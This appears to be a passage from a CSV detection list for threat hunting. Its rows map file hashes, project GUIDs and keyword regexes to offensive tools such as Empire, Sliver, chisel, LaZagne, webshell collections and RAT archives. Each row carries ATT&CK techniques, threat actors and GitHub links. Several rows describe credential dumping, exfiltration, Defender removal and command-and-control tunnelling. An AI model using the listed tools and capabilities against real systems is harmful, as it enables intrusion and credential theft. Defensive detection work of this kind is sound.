"*1337*/api/listeners?token=*",".{0,1000}1337.{0,1000}\/api\/listeners\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22116"
"*1337*infernal-twin*",".{0,1000}1337.{0,1000}infernal\-twin.{0,1000}","offensive_tool_keyword","infernal-twin","This tool is created to aid the penetration testers in assessing wireless security.","T1533 - T1553 - T1560 - T1569 - T1583","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/entropy1337/infernal-twin","1","1","N/A","network exploitation tool","N/A","10","1254","254","2022-10-27T11:39:14Z","2015-02-07T21:04:57Z","22117"
"*1337OMGsam*",".{0,1000}1337OMGsam.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","22118"
"*1337OMGsys*",".{0,1000}1337OMGsys.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","22119"
"*13398b7c4a972fa76c0e79e34fd4df50dd08452e100c9ae6cf44c35e61a49745*",".{0,1000}13398b7c4a972fa76c0e79e34fd4df50dd08452e100c9ae6cf44c35e61a49745.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22120"
"*13431429-2DB6-480F-B73F-CA019FE759E3*",".{0,1000}13431429\-2DB6\-480F\-B73F\-CA019FE759E3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","22121"
"*1358a679fb5b196075ae14c06133f304bcd259d5d7e86273805b7528ee5ef073*",".{0,1000}1358a679fb5b196075ae14c06133f304bcd259d5d7e86273805b7528ee5ef073.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22124"
"*135af50a105b966d85fc745bdac0b918c1afa0c1a7d4bbaf66acbc89eb59172a*",".{0,1000}135af50a105b966d85fc745bdac0b918c1afa0c1a7d4bbaf66acbc89eb59172a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22127"
"*1366b4cf8885fa1960344f67c82202ec3227b78a67c14c64ba981100ffe0991c*",".{0,1000}1366b4cf8885fa1960344f67c82202ec3227b78a67c14c64ba981100ffe0991c.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22128"
"*13694645a7643abaa67d282782fdb6f7e246ab06436ff22f6a4dae55c65af5df*",".{0,1000}13694645a7643abaa67d282782fdb6f7e246ab06436ff22f6a4dae55c65af5df.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22130"
"*136a55413120685e63b3ed8ceb5d3bc962aedaef520aa0d99ef347f7ae336f73*",".{0,1000}136a55413120685e63b3ed8ceb5d3bc962aedaef520aa0d99ef347f7ae336f73.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22131"
"*1372ebd0f43824ac646712ab9b47a28938e2b58eb1dce8337c1d905dea0f7523*",".{0,1000}1372ebd0f43824ac646712ab9b47a28938e2b58eb1dce8337c1d905dea0f7523.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","22134"
"*1377aa737a1f18c35e3165b43f3c814a8bda8fe5facb019bbeffc2146dfd42a5*",".{0,1000}1377aa737a1f18c35e3165b43f3c814a8bda8fe5facb019bbeffc2146dfd42a5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22135"
"*137b032bd7485d528ecbd52168dcbab45d13c3902fda391c46a0665d72938dbb*",".{0,1000}137b032bd7485d528ecbd52168dcbab45d13c3902fda391c46a0665d72938dbb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22136"
"*13827593b510bd2cb72270a7bd4aecfe90043112f1a70b879a36b0eaf1efcfa2*",".{0,1000}13827593b510bd2cb72270a7bd4aecfe90043112f1a70b879a36b0eaf1efcfa2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22138"
"*138fe6fe7171a4773027d687cf8b2e845b5e731ca1b239a5adb20cebe4b662ac*",".{0,1000}138fe6fe7171a4773027d687cf8b2e845b5e731ca1b239a5adb20cebe4b662ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22142"
"*1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63*",".{0,1000}1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22143"
"*139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa*",".{0,1000}139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22145"
"*13A59BB8-0246-4FFA-951B-89B9A341F159*",".{0,1000}13A59BB8\-0246\-4FFA\-951B\-89B9A341F159.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","22146"
"*13a77d1e3def5647f6d722269566e323c3a22c3793161bfda53cc7434e202b1e*",".{0,1000}13a77d1e3def5647f6d722269566e323c3a22c3793161bfda53cc7434e202b1e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22147"
"*13ac39c3d0379d55f1fdab74b78354fd7d8c23ce43e0bd2f86c64ec21f2abe63*",".{0,1000}13ac39c3d0379d55f1fdab74b78354fd7d8c23ce43e0bd2f86c64ec21f2abe63.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22148"
"*13b6173c509e41d78eff3266071dc52d6e45f81451d4203f20a761a748ce16f6*",".{0,1000}13b6173c509e41d78eff3266071dc52d6e45f81451d4203f20a761a748ce16f6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22150"
"*13bc46a72770c8f6d5f8305a625a8be7aae244ca60c3ff781193f755ab525e8f*",".{0,1000}13bc46a72770c8f6d5f8305a625a8be7aae244ca60c3ff781193f755ab525e8f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22153"
"*13C57810-FF18-4258-ABC9-935040A54F0B*",".{0,1000}13C57810\-FF18\-4258\-ABC9\-935040A54F0B.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#GUIDproject","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","22154"
"*13c6d7d3ec0c0713c9640cf99fccfe1f6ac615cc4d7b7edc4b0f6e574ab1c2a4*",".{0,1000}13c6d7d3ec0c0713c9640cf99fccfe1f6ac615cc4d7b7edc4b0f6e574ab1c2a4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22155"
"*13C84182-2F5F-4EE8-A37A-4483E7E57154*",".{0,1000}13C84182\-2F5F\-4EE8\-A37A\-4483E7E57154.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","#GUIDproject","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","22156"
"*13ce1d09e6b47a8c35d56416c864710146fccb4a93d6ef11aa4e550bdb1aef31*",".{0,1000}13ce1d09e6b47a8c35d56416c864710146fccb4a93d6ef11aa4e550bdb1aef31.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22157"
"*13d035ab6eb82b5527186ca674d8e17a018fd7389320d0df32c8fa2551df45d8*",".{0,1000}13d035ab6eb82b5527186ca674d8e17a018fd7389320d0df32c8fa2551df45d8.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22158"
"*13d08385c57fa21b113a4c2afc60207313926a79fbca29ed9e9f675685cfb873*",".{0,1000}13d08385c57fa21b113a4c2afc60207313926a79fbca29ed9e9f675685cfb873.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22159"
"*13d43aebab981754164f99adb93874642147e449bc9da03d03932d3884ac5acb*",".{0,1000}13d43aebab981754164f99adb93874642147e449bc9da03d03932d3884ac5acb.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","22160"
"*13d5d618565fd62c73768b9eb470d680972d27d6cfe85fa17692aeaca340d73e*",".{0,1000}13d5d618565fd62c73768b9eb470d680972d27d6cfe85fa17692aeaca340d73e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22161"
"*13dad918ff8a6a45552b0df38e2cb573cc3be2ce7fad3ae59d35b32be1ed6f9b*",".{0,1000}13dad918ff8a6a45552b0df38e2cb573cc3be2ce7fad3ae59d35b32be1ed6f9b.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","22162"
"*13de5a5579354f61ec2220bdc9f6bf0468243a850ab99a56bbdf2549145d30f6*",".{0,1000}13de5a5579354f61ec2220bdc9f6bf0468243a850ab99a56bbdf2549145d30f6.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22165"
"*13e50600945f06df6bbbf28c06f76ad655acfbd866cdac2845fc48be282b7e6a*",".{0,1000}13e50600945f06df6bbbf28c06f76ad655acfbd866cdac2845fc48be282b7e6a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22167"
"*13ef95f2a3a43e67984999804e255ac93cdc9d9f8df85a188ba04700f6f4565c*",".{0,1000}13ef95f2a3a43e67984999804e255ac93cdc9d9f8df85a188ba04700f6f4565c.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#filehash","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","22168"
"*13f225c454a7e1468244c9dbaad2e1968034e6aea0e16cb67a5139d798e05fbb*",".{0,1000}13f225c454a7e1468244c9dbaad2e1968034e6aea0e16cb67a5139d798e05fbb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22169"
"*13f42e004a25be9ba99aee3396a1d810026d7750d1e199774c5ba8410b15ae30*",".{0,1000}13f42e004a25be9ba99aee3396a1d810026d7750d1e199774c5ba8410b15ae30.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22171"
"*13fecc8eb1d401a6f859dce7225b08edb68349cdd12c7ce8388a3076b50d470a*",".{0,1000}13fecc8eb1d401a6f859dce7225b08edb68349cdd12c7ce8388a3076b50d470a.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22172"
"*14083A04-DD4B-4E7D-A16E-86947D3D6D74*",".{0,1000}14083A04\-DD4B\-4E7D\-A16E\-86947D3D6D74.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#GUIDproject","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","22174"
"*140bfb676a49c80b80f126ce16f37731aeb8ddbab4fdf67083676fc0d80c26e0*",".{0,1000}140bfb676a49c80b80f126ce16f37731aeb8ddbab4fdf67083676fc0d80c26e0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22175"
"*1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8*",".{0,1000}1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22178"
"*14268c474399ba634f0aedcd2411566fe97ceaecd2877cb14980c99bc43af31d*",".{0,1000}14268c474399ba634f0aedcd2411566fe97ceaecd2877cb14980c99bc43af31d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22179"
"*14268f4b4154d80f6c8a20bd79cca08e829cfef4d5f5c244d968c3652da7a336*",".{0,1000}14268f4b4154d80f6c8a20bd79cca08e829cfef4d5f5c244d968c3652da7a336.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","22180"
"*142b0a3e5c25ea73c368ef0f7d4d28136120e4927a59cd9f8fef258dc63c9ecf*",".{0,1000}142b0a3e5c25ea73c368ef0f7d4d28136120e4927a59cd9f8fef258dc63c9ecf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22182"
"*142d3b96f2c42d4660afb05c725185377a58cf521667ed4efc360171ffcc2e97*",".{0,1000}142d3b96f2c42d4660afb05c725185377a58cf521667ed4efc360171ffcc2e97.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22183"
"*142e61b92c40934e121c6204ad4a9cd2893cb3566e982a15d6df55454fe782af*",".{0,1000}142e61b92c40934e121c6204ad4a9cd2893cb3566e982a15d6df55454fe782af.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22184"
"*143ec041216db8df445e02dbb3a71e1603ab495879f073f63857474e32d239b4*",".{0,1000}143ec041216db8df445e02dbb3a71e1603ab495879f073f63857474e32d239b4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22186"
